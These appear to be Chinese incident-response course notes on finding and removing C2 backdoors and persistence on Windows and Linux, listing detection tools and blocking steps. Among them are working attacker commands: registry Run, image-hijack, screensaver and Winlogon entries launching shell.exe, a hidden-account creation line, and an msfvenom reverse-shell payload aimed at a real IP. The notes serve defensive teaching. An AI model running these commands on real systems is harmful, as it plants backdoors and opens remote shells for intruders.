知识点
1、应急响应-C2后门-排查&封锁
2、应急响应-权限维持-排查&清理
3、应急响应-基线检测-整改&排查
演示案例-蓝队技能-C2后门&权限维持-基线检查&查杀封锁-Windows
1、常规C2后门-分析检测
无隐匿手法
也可以把怀疑的exe程序上传到沙箱上分析
有隐匿手法
CDN,云函数,中转等(涉及溯源和反制)
处置手段
清除:删除文件
封锁:防火墙都有出入站规则,需要自己判断在哪里设置封锁策略
1、防火墙阻止程序
(一般没啥用,变个文件名就不行了)
2、防火墙阻止网络链接-IP
2、权限维持技术-分析检测
自启动测试
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\shell.exe" //把shell.exe放入启动项并命名为backdoor
隐藏账户
net user xiaodi$ xiaodi!@#X123 /add
可以使用PCHunter工具查看当前系统用户
或者
运行-lusrmgr.msc-本地用户和组-用户
映像劫持
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c c:/shell.exe"
可以使用PCHunter或者火绒剑工具查看
屏保&登录
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\shell.exe" /f //进入锁屏后会触发shell.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\shell.exe" //有人登录这台计算机的时候就会触发shell.exe
3、Rookit后门-分析检测
后续讲到
4、Web的内存马-分析检测
后续讲到
5、基线检测配合分析项目
Golin
WindowsBaselineAssistant
d-eyes
FindAll
演示案例-蓝队技能-C2后门&权限维持-基线检查&查杀封锁-Linux
1、常规C2后门-分析检测
无隐匿手法
常规后门:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=7777 -f elf >shell.elf
netstat -anpt
有隐匿手法
CDN,云函数,中转等(涉及溯源和反制)
处置手段
删除文件,防火墙阻止程序或IP域名等
2、权限维持技术-分析检测
GScan
Golin
d-eyes
Whoamifuck
Ashro_linux
linuxcheckshoot
3、Rookit后门-分析检测
后续讲到
4、Web的内存马-分析检测
后续讲到
